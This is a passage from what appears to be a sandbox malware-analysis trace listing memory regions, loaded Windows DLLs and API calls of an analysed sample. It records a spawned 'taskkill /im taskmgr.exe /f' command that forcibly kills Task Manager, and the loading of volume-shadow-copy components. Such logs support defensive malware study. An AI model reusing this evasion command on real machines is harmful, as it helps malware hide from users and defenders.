"pagefile_0x000000007ffb0000" filename = "" Region: id = 916 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 917 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 918 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 919 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 920 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 921 start_va = 0x140000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 922 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 923 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 924 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 925 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 926 start_va = 0x400000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 927 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 928 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 929 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 930 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 931 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 932 start_va = 0x4c0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 933 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 934 start_va = 0x77b10000 end_va = 0x77b8afff monitored = 0 entry_point = 0x77b2e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 935 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 936 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 937 start_va = 0x190000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 938 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 939 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 940 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 941 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 942 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 943 start_va = 0x750d0000 end_va = 0x75216fff monitored = 0 entry_point = 0x750e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 944 start_va = 0x77440000 end_va = 0x7758efff monitored = 0 entry_point = 0x774f6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 945 start_va = 0x74d80000 end_va = 0x74e11fff monitored = 0 entry_point = 0x74db8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 946 start_va = 0x752b0000 end_va = 0x7546cfff monitored = 0 entry_point = 0x75392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 947 start_va = 0x77590000 end_va = 0x775d4fff monitored = 0 entry_point = 0x775ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 948 start_va = 0x6eec0000 end_va = 0x6eed7fff monitored = 0 entry_point = 0x6eec4820 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll") Region: id = 949 start_va = 0x6e460000 end_va = 0x6e470fff monitored = 0 entry_point = 0x6e464670 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll") Region: id = 950 start_va = 0x5c0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 951 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 952 start_va = 0x6b150000 end_va = 0x6b26afff monitored = 0 entry_point = 0x6b190930 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll") Region: id = 953 start_va = 0x773e0000 end_va = 0x7743efff monitored = 0 entry_point = 0x773e4af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 954 start_va = 0x640000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 955 start_va = 0x110000 end_va = 0x139fff monitored = 0 entry_point = 0x115680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 956 start_va = 0x4900000 end_va = 0x4a87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004900000" filename = "" Region: id = 957 start_va = 0x75660000 end_va = 0x7568afff monitored = 0 entry_point = 0x75665680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 958 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 959 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 960 start_va = 0x120000 end_va = 0x12cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vssadmin.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui") Region: id = 961 start_va = 0x4a90000 end_va = 0x4c10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a90000" filename = "" Region: id = 962 start_va = 0x4c20000 end_va = 0x601ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c20000" filename = "" Region: id = 963 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 964 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 965 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 966 start_va = 0x640000 end_va = 0x729fff monitored = 0 entry_point = 0x67d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 967 start_va = 0x790000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 968 start_va = 0x77320000 end_va = 0x7732bfff monitored = 0 entry_point = 0x77323930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 969 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 970 start_va = 0x75220000 end_va = 0x752a3fff monitored = 0 entry_point = 0x75246220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 971 start_va = 0x640000 end_va = 0x640fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 972 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 973 start_va = 0x690000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 974 start_va = 0x6d0000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 975 start_va = 0x710000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 976 start_va = 0x750000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 977 start_va = 0x7a0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 978 start_va = 0x7e0000 end_va = 0x8bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 979 start_va = 0x6020000 end_va = 0x609ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006020000" filename = "" Region: id = 980 start_va = 0x60a0000 end_va = 0x649afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000060a0000" filename = "" Thread: id = 33 os_tid = 0x10d8 Thread: id = 34 os_tid = 0x1108 Thread: id = 35 os_tid = 0x1114 Thread: id = 36 os_tid = 0x114c Thread: id = 37 os_tid = 0x1150 Thread: id = 38 os_tid = 0xfcc Process: id = "11" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3c5f0000" os_pid = "0xf94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C taskkill /im taskmgr.exe /f" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 987 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 988 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 989 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 990 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 991 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 992 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 993 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 994 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 995 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 996 start_va = 0xd00000 end_va = 0xd51fff monitored = 1 entry_point = 0xd14fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 997 start_va = 0xd60000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 998 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 999 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1000 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1001 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1002 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 1003 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1004 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 1005 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1006 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1007 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1008 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1009 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1010 start_va = 0x600000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1011 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1012 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1013 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1014 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1015 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1097 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1098 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1099 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1100 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1101 start_va = 0x8a0000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 1102 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1103 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1104 start_va = 0x4d60000 end_va = 0x5096fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 39 os_tid = 0x430 [0248.132] GetModuleHandleA (lpModuleName=0x0) returned 0xd00000 [0248.132] __set_app_type (_Type=0x1) [0248.132] __p__fmode () returned 0x74ac4d6c [0248.132] __p__commode () returned 0x74ac5b1c [0248.132] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd15200) returned 0x0 [0248.133] __getmainargs (in: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0, _DoWildCard=0, _StartInfo=0xd260fc | out: _Argc=0xd260e8, _Argv=0xd260ec, _Env=0xd260f0) returned 0 [0248.133] GetCurrentThreadId () returned 0x430 [0248.133] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x430) returned 0x84 [0248.133] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f30000 [0248.133] GetProcAddress (hModule=0x74f30000, lpProcName="SetThreadUILanguage") returned 0x74f72510 [0248.133] SetThreadUILanguage (LangId=0x0) returned 0x409 [0248.140] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0248.140] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0248.140] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0248.140] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0248.140] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0248.140] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0248.140] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0248.140] GetConsoleOutputCP () returned 0x1b5 [0248.141] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0248.141] SetConsoleCtrlHandler (HandlerRoutine=0xd20e40, Add=1) returned 1 [0248.141] _get_osfhandle (_FileHandle=1) returned 0x3c [0248.142] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0248.142] _get_osfhandle (_FileHandle=1) returned 0x3c [0248.142] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0248.142] _get_osfhandle (_FileHandle=1) returned 0x3c [0248.142] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0248.143] _get_osfhandle (_FileHandle=0) returned 0x38 [0248.143] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0248.143] _get_osfhandle (_FileHandle=0) returned 0x38 [0248.143] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0248.144] GetEnvironmentStringsW () returned 0x7a7cf8* [0248.144] GetProcessHeap () returned 0x7a0000 [0248.144] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0xa1a) returned 0x7a8720 [0248.144] FreeEnvironmentStringsA (penv="A") returned 1 [0248.144] GetProcessHeap () returned 0x7a0000 [0248.144] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0x4) returned 0x7a0550 [0248.144] GetEnvironmentStringsW () returned 0x7a7cf8* [0248.144] GetProcessHeap () returned 0x7a0000 [0248.144] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x8, Size=0xa1a) returned 0x7a9148 [0248.144] FreeEnvironmentStringsA (penv="A") returned 1 [0248.144] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0248.145] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0248.145] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0248.145] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0248.145] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0248.145] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0248.145] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0248.145] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0248.145] RegCloseKey (hKey=0x94) returned 0x0 [0248.146] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0248.146] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0248.146] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0248.146] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0248.146] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0248.146] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, 